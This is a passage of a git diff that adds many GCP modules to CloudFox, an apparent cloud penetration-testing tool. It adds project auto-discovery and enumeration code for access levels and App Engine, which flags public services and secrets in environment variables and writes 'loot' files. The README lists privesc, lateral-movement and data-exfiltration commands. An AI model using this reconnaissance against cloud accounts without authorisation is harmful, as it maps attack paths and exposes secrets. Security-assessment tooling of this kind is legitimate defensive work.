diff --git a/.gitignore b/.gitignore index 9dac55a5..cd9cead3 100644 --- a/.gitignore +++ b/.gitignore @@ -62,8 +62,11 @@ terraform.rc .DS_Store untracked/* +*tmp* +tmp/* output/* *cloudfox-output* +cloudfox-* cloudfox *.log *.bak @@ -75,4 +78,4 @@ dist/ # graphvis files *.gv -*.svg \ No newline at end of file +*.svg diff --git a/README.md b/README.md index d9f5fd53..0c1a03a0 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,9 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | Provider| CloudFox Commands | | - | - | -| AWS | 34 | -| Azure | 4 | -| GCP | 8 | +| AWS | 34 | +| Azure | 4 | +| GCP | 57 | | Kubernetes | Support Planned | @@ -159,22 +159,109 @@ Additional policy notes (as of 09/2022): # GCP Commands -| Provider | Command Name | Description + +## Identity & Access Management +| Provider | Command Name | Description | +| - | - | - | +| GCP | whoami | Display identity context for the authenticated GCP user/service account | +| GCP | iam | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | permissions | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | serviceaccounts | Enumerate GCP service accounts with security analysis | +| GCP | service-agents | Enumerate Google-managed service agents | +| GCP | keys | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | +| GCP | resource-iam | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | +| GCP | domain-wide-delegation | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | privesc | Identify privilege escalation paths in GCP projects | + +## Compute & Containers +| Provider | Command Name | Description | +| - | - | - | +| GCP | instances | Enumerate GCP Compute Engine instances with security configuration | +| GCP | gke | Enumerate GKE clusters with security analysis | +| GCP | cloudrun | Enumerate Cloud Run services and jobs with security analysis | +| GCP | functions | Enumerate GCP Cloud Functions with security analysis | +| GCP | app-engine | Enumerate App Engine applications and security configurations | +| GCP | composer | Enumerate Cloud Composer environments | +| GCP | dataproc | Enumerate Dataproc clusters | +| GCP | dataflow | Enumerate Dataflow jobs and pipelines | +| GCP | notebooks | Enumerate Vertex AI Workbench notebooks | +| GCP | workload-identity | Enumerate GKE Workload Identity and Workload Identity Federation | + +## Storage & Databases +| Provider | Command Name | Description | +| - | - | - | +| GCP | buckets | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | bucket-enum | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | bigquery | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | cloudsql | Enumerate Cloud SQL instances with security analysis | +| GCP | spanner | Enumerate Cloud Spanner instances and databases | +| GCP | bigtable | Enumerate Cloud Bigtable instances and tables | +| GCP | filestore | Enumerate Filestore NFS instances | +| GCP | memorystore | Enumerate Memorystore (Redis) instances | + +## Networking +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-networks | Enumerate VPC Networks | +| GCP | firewall | Enumerate VPC networks and firewall rules with security analysis | +| GCP | loadbalancers | Enumerate Load Balancers | +| GCP | dns | Enumerate Cloud DNS zones and records with security analysis | +| GCP | endpoints | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | private-service-connect | Enumerate Private Service Connect endpoints and service attachments | +| GCP | network-topology | Visualize VPC network topology, peering relationships, and trust boundaries | + +## Security & Compliance +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-sc | Enumerate VPC Service Controls | +| GCP | access-levels | Enumerate Access Context Manager access levels | +| GCP | cloud-armor | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | iap | Enumerate Identity-Aware Proxy configurations | +| GCP | beyondcorp | Enumerate BeyondCorp Enterprise configurations | +| GCP | kms | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | secrets | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | cert-manager | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | org-policies | Enumerate organization policies and identify security weaknesses | + +## CI/CD & Source Control +| Provider | Command Name | Description | +| - | - | - | +| GCP | artifact-registry | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | cloudbuild | Enumerate Cloud Build triggers and builds | +| GCP | source-repos | Enumerate Cloud Source Repositories | +| GCP | scheduler | Enumerate Cloud Scheduler jobs with security analysis | + +## Messaging & Events +| Provider | Command Name | Description | +| - | - | - | +| GCP | pubsub | Enumerate Pub/Sub topics and subscriptions with security analysis | + +## Logging & Monitoring +| Provider | Command Name | Description | +| - | - | - | +| GCP | logging | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | logging-gaps | Find resources with missing or incomplete logging | + +## Organization & Projects +| Provider | Command Name | Description | +| - | - | - | +| GCP | organizations | Enumerate GCP organization hierarchy | +| GCP | asset-inventory | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | backup-inventory | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | cross-project | Analyze cross-project access patterns for lateral movement | + +## Attack Path Analysis +| Provider | Command Name | Description | | - | - | - | -| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display the email address of the GCP authenticated user | -| GCP | [all-checks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#all-checks) | Runs all available GCP commands | -| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Display GCP artifact registry information | -| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Display Bigquery datasets and tables information | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Display GCP buckets information | -| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Display GCP IAM information | -| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Display GCP Compute Engine instances information | -| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Display GCP secrets information | +| GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | data-exfiltration | Identify data exfiltration paths and high-risk data exposure | # Authors * [Carlos Vendramini](https://github.com/carlosvendramini-bf) * [Seth Art (@sethsec](https://twitter.com/sethsec)) +* Joseph Barcia # Contributing [Wiki - How to Contribute](https://github.com/BishopFox/cloudfox/wiki#how-to-contribute) diff --git a/cli/gcp.go b/cli/gcp.go index e69efb6b..ede190ea 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -6,6 +6,7 @@ import ( "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) @@ -16,6 +17,10 @@ var ( GCPProjectID string GCPProjectIDsFilePath string GCPProjectIDs []string + GCPAllProjects bool + + // Project name mapping (ProjectID -> DisplayName) + GCPProjectNames map[string]string // Output formatting options GCPOutputFormat string @@ -36,18 +41,45 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { - if GCPProjectID != "" { + // Initialize project names map + GCPProjectNames = make(map[string]string) + + // Handle project discovery based on flags + if GCPAllProjects { + // Discover all accessible projects + GCPLogger.InfoM("Discovering all accessible projects...", "gcp") + orgsSvc := orgsservice.New() + projects, err := orgsSvc.SearchProjects("") + if err != nil { + GCPLogger.FatalM(fmt.Sprintf("Failed to discover projects: %v. Try using -p or -l flags instead.", err), "gcp") + } + for _, proj := range projects { + if proj.State == "ACTIVE" { + GCPProjectIDs = append(GCPProjectIDs, proj.ProjectID) + GCPProjectNames[proj.ProjectID] = proj.DisplayName + } + } + if len(GCPProjectIDs) == 0 { + GCPLogger.FatalM("No accessible projects found. Check your permissions.", "gcp") + } + GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") + } else if GCPProjectID != "" { GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + // Resolve project name for single project + resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + // Resolve project names for all projects in list + resolveProjectNames(GCPProjectIDs) } else { - GCPLogger.InfoM("project or project-list flags not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("project, project-list, or all-projects flag not given, commands requiring a project ID will fail", "gcp") } - // Create a context with this value to share it with subcommands at runtime + + // Create a context with project IDs and names ctx := context.WithValue(context.Background(), "projectIDs", GCPProjectIDs) + ctx = context.WithValue(ctx, "projectNames", GCPProjectNames) - // Set the context for this command which all subcommands can access via [SUBCMD].Parent().Context() - // cmd.SetContext(ctx) + // Authenticate and get account info os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { @@ -59,6 +91,40 @@ var ( } ) +// resolveProjectNames fetches display names for given project IDs +func resolveProjectNames(projectIDs []string) { + if len(projectIDs) == 0 { + return + } + + orgsSvc := orgsservice.New() + // Fetch all accessible projects and build lookup map + projects, err := orgsSvc.SearchProjects("") + if err != nil { + // Non-fatal: we can continue without display names + GCPLogger.InfoM("Could not resolve project names, using project IDs only", "gcp") + for _, id := range projectIDs { + GCPProjectNames[id] = id // fallback to using ID as name + } + return + } + + // Build lookup from fetched projects + projectLookup := make(map[string]string) + for _, proj := range projects { + projectLookup[proj.ProjectID] = proj.DisplayName + } + + // Map our project IDs to names + for _, id := range projectIDs { + if name, ok := projectLookup[id]; ok { + GCPProjectNames[id] = name + } else { + GCPProjectNames[id] = id // fallback to using ID as name + } + } +} + // New RunAllGCPCommands function to execute all child commands var GCPAllChecksCommand = &cobra.Command{ Use: "all-checks", @@ -69,6 +135,9 @@ var GCPAllChecksCommand = &cobra.Command{ if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion continue } + if childCmd.Hidden { // Skip hidden commands + continue + } GCPLogger.InfoM(fmt.Sprintf("Running command: %s", childCmd.Use), "all-checks") childCmd.Run(cmd, args) @@ -86,7 +155,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - // GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Use all project IDs available to activated gloud account or given gcloud account") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Automatically discover and use all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") @@ -97,13 +166,85 @@ func init() { // Available commands GCPCommands.AddCommand( + // Core/existing commands commands.GCPBucketsCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, commands.GCPSecretsCommand, commands.GCPIAMCommand, + commands.GCPPermissionsCommand, + commands.GCPResourceIAMCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, + + // Compute/serverless commands + commands.GCPFunctionsCommand, + commands.GCPCloudRunCommand, + commands.GCPAppEngineCommand, + commands.GCPGKECommand, + commands.GCPCloudSQLCommand, + + // New infrastructure commands + commands.GCPPubSubCommand, + commands.GCPKMSCommand, + commands.GCPLoggingCommand, + commands.GCPSchedulerCommand, + commands.GCPDNSCommand, + commands.GCPFirewallCommand, + commands.GCPServiceAccountsCommand, + commands.GCPKeysCommand, + commands.GCPEndpointsCommand, + commands.GCPWorkloadIdentityCommand, + commands.GCPOrganizationsCommand, + commands.GCPCloudBuildCommand, + commands.GCPMemorystoreCommand, + commands.GCPFilestoreCommand, + commands.GCPSpannerCommand, + commands.GCPBigtableCommand, + + // Data processing commands + commands.GCPDataflowCommand, + commands.GCPComposerCommand, + + // Security/Compliance commands + commands.GCPVPCSCCommand, + commands.GCPAssetInventoryCommand, + commands.GCPSecurityCenterCommand, + commands.GCPComplianceDashboardCommand, + commands.GCPBackupInventoryCommand, + commands.GCPCostSecurityCommand, + commands.GCPMonitoringAlertsCommand, + + // Network/Infrastructure commands + commands.GCPLoadBalancersCommand, + commands.GCPVPCNetworksCommand, + commands.GCPNetworkTopologyCommand, + + // ML/Data Science commands + commands.GCPNotebooksCommand, + commands.GCPDataprocCommand, + + // Zero Trust/Access commands + commands.GCPIAPCommand, + commands.GCPBeyondCorpCommand, + commands.GCPAccessLevelsCommand, + + // Pentest/Exploitation commands + commands.GCPPrivescCommand, + commands.GCPOrgPoliciesCommand, + commands.GCPBucketEnumCommand, + commands.GCPCrossProjectCommand, + commands.GCPLoggingGapsCommand, + commands.GCPSourceReposCommand, + commands.GCPServiceAgentsCommand, + commands.GCPDomainWideDelegationCommand, + commands.GCPPrivateServiceConnectCommand, + commands.GCPCloudArmorCommand, + commands.GCPCertManagerCommand, + commands.GCPLateralMovementCommand, + commands.GCPDataExfiltrationCommand, + + // All checks (last) GCPAllChecksCommand, ) } diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go new file mode 100644 index 00000000..01e1bd91 --- /dev/null +++ b/gcp/commands/accesslevels.go @@ -0,0 +1,272 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +var accessLevelOrgID string + +var GCPAccessLevelsCommand = &cobra.Command{ + Use: globals.GCP_ACCESSLEVELS_MODULE_NAME, + Aliases: []string{"access-levels", "conditional-access", "ca"}, + Short: "Enumerate Access Context Manager access levels", + Long: `Enumerate Access Context Manager access levels (conditional access policies). + +Features: +- Lists all access levels in the organization +- Shows IP-based, device-based, and identity conditions +- Identifies overly permissive access levels +- Analyzes device policy requirements + +Organization Discovery: +- Automatically discovers organization from project ancestry if --org not specified +- Use --org to explicitly specify an organization ID`, + Run: runGCPAccessLevelsCommand, +} + +func init() { + GCPAccessLevelsCommand.Flags().StringVar(&accessLevelOrgID, "org", "", "Organization ID (required)") +} + +type AccessLevelsModule struct { + gcpinternal.BaseGCPModule + OrgID string + AccessLevels []accesspolicyservice.AccessLevelInfo + LootMap map[string]*internal.LootFile +} + +type AccessLevelsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AccessLevelsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AccessLevelsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ACCESSLEVELS_MODULE_NAME) + if err != nil { + return + } + + // Discover organizations if not specified + orgIDs := []string{} + if accessLevelOrgID != "" { + orgIDs = append(orgIDs, accessLevelOrgID) + } else { + // Auto-discover organizations from project ancestry + discoveredOrgs := discoverOrganizations(cmdCtx.Ctx, cmdCtx.ProjectIDs, cmdCtx.Logger) + if len(discoveredOrgs) == 0 { + cmdCtx.Logger.ErrorM("Could not discover any organizations. Use --org flag to specify one.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + orgIDs = discoveredOrgs + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + // Run for each organization + for _, orgID := range orgIDs { + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: orgID, + AccessLevels: []accesspolicyservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) + } +} + +// discoverOrganizations finds organization IDs from project ancestry +func discoverOrganizations(ctx context.Context, projectIDs []string, logger internal.Logger) []string { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil + } + + orgMap := make(map[string]bool) + for _, projectID := range projectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + continue + } + + for _, ancestor := range resp.Ancestor { + if ancestor.ResourceId.Type == "organization" { + orgMap[ancestor.ResourceId.Id] = true + } + } + } + + var orgs []string + for orgID := range orgMap { + orgs = append(orgs, orgID) + } + return orgs +} + +func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", m.OrgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + + svc := accesspolicyservice.New() + + levels, err := svc.ListAccessLevels(m.OrgID) + if err != nil { + // Use shared error handling + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", m.OrgID)) + return + } + + m.AccessLevels = levels + + if len(m.AccessLevels) == 0 { + logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + for _, level := range m.AccessLevels { + m.addToLoot(level) + } + + logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(m.AccessLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AccessLevelsModule) initializeLootFiles() { + m.LootMap["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", + } + m.LootMap["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", + Contents: "", + } +} + +func (m *AccessLevelsModule) addToLoot(level accesspolicyservice.AccessLevelInfo) { + m.LootMap["access-levels-details"].Contents += fmt.Sprintf( + "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + for _, condition := range level.Conditions { + for _, ip := range condition.IPSubnetworks { + m.LootMap["access-levels-allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } + } +} + +func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Levels table + header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} + var body [][]string + for _, level := range m.AccessLevels { + hasDevicePolicy := "No" + for _, cond := range level.Conditions { + if cond.DevicePolicy != nil { + hasDevicePolicy = "Yes" + break + } + } + + combiningFunc := level.CombiningFunction + if combiningFunc == "" { + combiningFunc = "AND" + } + + body = append(body, []string{ + level.Name, + level.Title, + level.PolicyName, + combiningFunc, + fmt.Sprintf("%d", len(level.Conditions)), + hasDevicePolicy, + }) + } + tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: header, + Body: body, + }) + + // Conditions detail table + var condBody [][]string + for _, level := range m.AccessLevels { + for i, cond := range level.Conditions { + ipRanges := strings.Join(cond.IPSubnetworks, ", ") + if ipRanges == "" { + ipRanges = "(any)" + } + + members := strings.Join(cond.Members, ", ") + if members == "" { + members = "(any)" + } + + regions := strings.Join(cond.Regions, ", ") + if regions == "" { + regions = "(any)" + } + + deviceReqs := "(none)" + if cond.DevicePolicy != nil { + var reqs []string + if cond.DevicePolicy.RequireScreenLock { + reqs = append(reqs, "screen-lock") + } + if cond.DevicePolicy.RequireCorpOwned { + reqs = append(reqs, "corp-owned") + } + if cond.DevicePolicy.RequireAdminApproval { + reqs = append(reqs, "admin-approval") + } + if len(reqs) > 0 { + deviceReqs = strings.Join(reqs, ", ") + } + } + + condBody = append(condBody, []string{ + level.Name, + fmt.Sprintf("%d", i+1), + ipRanges, + members, + regions, + deviceReqs, + }) + } + } + + if len(condBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-conditions", + Header: []string{"Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"}, + Body: condBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AccessLevelsOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go new file mode 100644 index 00000000..959b040f --- /dev/null +++ b/gcp/commands/appengine.go @@ -0,0 +1,619 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/appengine/v1" +) + +// Module name constant +const GCP_APPENGINE_MODULE_NAME string = "app-engine" + +var GCPAppEngineCommand = &cobra.Command{ + Use: GCP_APPENGINE_MODULE_NAME, + Aliases: []string{"appengine", "gae"}, + Short: "Enumerate App Engine applications and security configurations", + Long: `Analyze App Engine applications for security configurations and potential issues. + +Features: +- Lists all App Engine services and versions +- Identifies public services without authentication +- Analyzes ingress settings and firewall rules +- Detects environment variable secrets +- Reviews service account configurations +- Identifies deprecated runtimes +- Analyzes traffic splitting configurations`, + Run: runGCPAppEngineCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AppEngineApp struct { + ProjectID string + ID string + LocationID string + AuthDomain string + DefaultHostname string + ServingStatus string + DefaultBucket string + ServiceAccount string + DispatchRules int + FirewallRules int +} + +type AppEngineService struct { + ProjectID string + ID string + AppID string + Split map[string]float64 + DefaultURL string + VersionCount int + LatestVersion string +} + +type AppEngineVersion struct { + ProjectID string + ServiceID string + ID string + AppID string + Runtime string + Environment string + ServingStatus string + CreateTime string + InstanceClass string + Scaling string + Network string + VPCConnector string + IngressSettings string + EnvVarCount int + SecretEnvVars int + ServiceAccount string + URL string + DeprecatedRuntime bool + DefaultSA bool + Public bool +} + +type AppEngineFirewallRule struct { + ProjectID string + Priority int64 + Action string + SourceRange string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type AppEngineModule struct { + gcpinternal.BaseGCPModule + + Apps []AppEngineApp + Services []AppEngineService + Versions []AppEngineVersion + FirewallRules []AppEngineFirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex + + totalApps int + totalServices int + publicCount int + secretsFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type AppEngineOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AppEngineOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) + if err != nil { + return + } + + module := &AppEngineModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Apps: []AppEngineApp{}, + Services: []AppEngineService{}, + Versions: []AppEngineVersion{}, + FirewallRules: []AppEngineFirewallRule{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) + + aeService, err := appengine.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) + return + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, aeService, logger) + }(projectID) + } + wg.Wait() + + if m.totalApps == 0 { + logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", + m.totalApps, m.totalServices, len(m.Versions)), GCP_APPENGINE_MODULE_NAME) + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + } + + if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *AppEngineModule) processProject(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) + } + + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + if !strings.Contains(err.Error(), "404") { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not get App Engine app in project %s", projectID)) + } + return + } + + m.mu.Lock() + m.totalApps++ + m.mu.Unlock() + + appRecord := AppEngineApp{ + ProjectID: projectID, + ID: app.Id, + LocationID: app.LocationId, + AuthDomain: app.AuthDomain, + DefaultHostname: app.DefaultHostname, + ServingStatus: app.ServingStatus, + DefaultBucket: app.DefaultBucket, + ServiceAccount: app.ServiceAccount, + } + + if app.DispatchRules != nil { + appRecord.DispatchRules = len(app.DispatchRules) + } + + m.mu.Lock() + m.Apps = append(m.Apps, appRecord) + m.mu.Unlock() + + m.enumerateServices(ctx, projectID, aeService, logger) + m.enumerateFirewallRules(ctx, projectID, aeService, logger) +} + +func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + services, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine services in project %s", projectID)) + return + } + + for _, svc := range services.Services { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + serviceRecord := AppEngineService{ + ProjectID: projectID, + ID: svc.Id, + AppID: projectID, + } + + if svc.Split != nil { + serviceRecord.Split = svc.Split.Allocations + } + + m.mu.Lock() + m.Services = append(m.Services, serviceRecord) + m.mu.Unlock() + + ingressSettings := "all" + if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { + ingressSettings = svc.NetworkSettings.IngressTrafficAllowed + } + + m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) + } +} + +func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { + versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine versions for service %s", serviceID)) + return + } + + for _, ver := range versions.Versions { + versionRecord := AppEngineVersion{ + ProjectID: projectID, + ServiceID: serviceID, + ID: ver.Id, + AppID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + IngressSettings: ingressSettings, + ServiceAccount: ver.ServiceAccount, + URL: ver.VersionUrl, + } + + if ver.InstanceClass != "" { + versionRecord.InstanceClass = ver.InstanceClass + } + + if ver.Network != nil { + versionRecord.Network = ver.Network.Name + } + + if ver.VpcAccessConnector != nil { + versionRecord.VPCConnector = ver.VpcAccessConnector.Name + } + + // Scaling type + if ver.AutomaticScaling != nil { + versionRecord.Scaling = "automatic" + } else if ver.BasicScaling != nil { + versionRecord.Scaling = "basic" + } else if ver.ManualScaling != nil { + versionRecord.Scaling = "manual" + } + + // Check for deprecated runtime + versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) + + // Check environment variables for secrets + if ver.EnvVariables != nil { + versionRecord.EnvVarCount = len(ver.EnvVariables) + secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) + versionRecord.SecretEnvVars = secretCount + } + + // Check ingress settings for public access + if versionRecord.IngressSettings == "all" || versionRecord.IngressSettings == "INGRESS_TRAFFIC_ALLOWED_ALL" { + versionRecord.Public = true + m.mu.Lock() + m.publicCount++ + m.mu.Unlock() + } + + // Check for default service account + if versionRecord.ServiceAccount == "" || strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { + versionRecord.DefaultSA = true + } + + m.mu.Lock() + m.Versions = append(m.Versions, versionRecord) + m.mu.Unlock() + } +} + +func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine firewall rules in project %s", projectID)) + return + } + + for _, rule := 